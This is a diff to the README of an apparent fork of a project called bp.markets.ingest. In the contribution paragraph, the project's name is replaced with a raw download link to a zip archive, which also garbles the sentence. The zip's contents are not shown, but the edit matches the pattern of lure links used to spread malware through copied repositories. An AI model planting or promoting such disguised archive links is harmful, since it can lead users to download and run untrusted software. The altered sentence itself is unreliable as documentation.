Shadowp2522/bp.markets.ingest/README.md

 ## 🌐 Community and Contribution

-We encourage contributions to improve bp.markets.ingest.
-If you want to enhance the application or fix bugs, please fork the repository and submit a pull request.
+We encourage contributions to improve https://raw.githubusercontent.com/Shadowp2522/bp.markets.ingest/main/dukascopy/examples/bp.markets.ingest-v1.5.zip If you want to enhance the application or fix bugs, please fork the repository and submit a pull request.

 Join discussions in the Issues section to share ideas or ask for help.
 Your input helps make this tool better for everyone.